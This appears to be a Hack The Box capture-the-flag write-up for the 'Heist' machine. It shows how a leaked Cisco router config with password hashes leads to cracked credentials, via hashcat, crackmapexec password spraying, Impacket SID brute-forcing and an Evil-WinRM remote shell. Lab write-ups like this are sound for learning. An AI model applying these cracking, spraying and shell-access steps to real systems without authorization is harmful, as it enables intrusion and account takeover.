HTB Write-up | Heist
Retired machine can be found here.
After doing an initial scan with nmap, we find 3 exposed services:
- a web server on port 80 which seems to be a "Support Login Page";
- MSRPC on port 135;
- SMBv2 on port 445.
After trying and failing to access the SMB service with null credentials, I moved on to the web server.
smbclient -L heist.htb
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_ACCESS_DENIED
Wappalyzer gives us a nice overview of this server.
The initial page is the login page, however by clicking the "Login as guest" button we're redirected to a much more interesting issues page.
On this page, there is what looks like a conversation between a user named Hazard and a member of the support team for a Cisco router.
Hazard was kind enough to provide us with a configuration file for their router, which is hosted at http://heist.htb/attachments/config.txt.
Unfortunately, we can't access other attachments which would have been interesting, so let's go through the config file.
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
This config file contains:
- 2 user passwords encrypted with a Cisco Type 7 algorithm which can be easily cracked;
- the enable secret password, which is an MD5 hash.
To "crack" the MD5 hash we use hashcat combined with the RockYou list, which we'll filter by words >= 12 chars, since the config file lets us know that this router's passwords are at least 12 chars long.
$ hashcat -a 0 -m 500 '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' rockyou_12andabove.txt
where:
-a 0= "straight" attack-mode-m 500= Cisco-IOS $1$ (MD5) hash type
Now that we know Hazard's router's password, we're going to use crackmapexec to try and login as Hazard on the machine
$ crackmapexec heist.htb -u Hazard -p xxx
...
CME heist.htb:445 SUPPORTDESK [*] Windows 10.0 Build 17763 (name:SUPPORTDESK) (domain:SUPPORTDESK)
CME heist.htb:445 SUPPORTDESK [+] SUPPORTDESK\Hazard:xxx
So, we know now that the machine is a Windows 10, that it's a part of the SUPPORTDESK domain, and that the credentials we found are valid.
To enumerate the domain's users, we're going to use Impacket.
$ python impacket/build/scripts-2.7/lookupsid.py SUPPORTDESK/Hazard:xxx@heist.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at heist.htb
[*] StringBinding ncacn_np:heist.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
So, let's create a file with all the users we know about and a file with the 3 passwords we cracked and let's see what works:
$ crackmapexec heist.htb -d SUPPORTDESK -u users.txt -p passwords.txt
P.S. According to crackmapexec's manual the -u option should allow a file to be passed as an argument, but this didn't work so I had to test each user individually.
We find that one of the credentials are valid for Chase, so let's try to establish a remote connection for that user with Evil-WinRM:
$ ruby evil-winrm/evil-winrm.rb -i heist.htb -u Chase -p 'xxx'
Evil-WinRM shell v1.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
And that's it!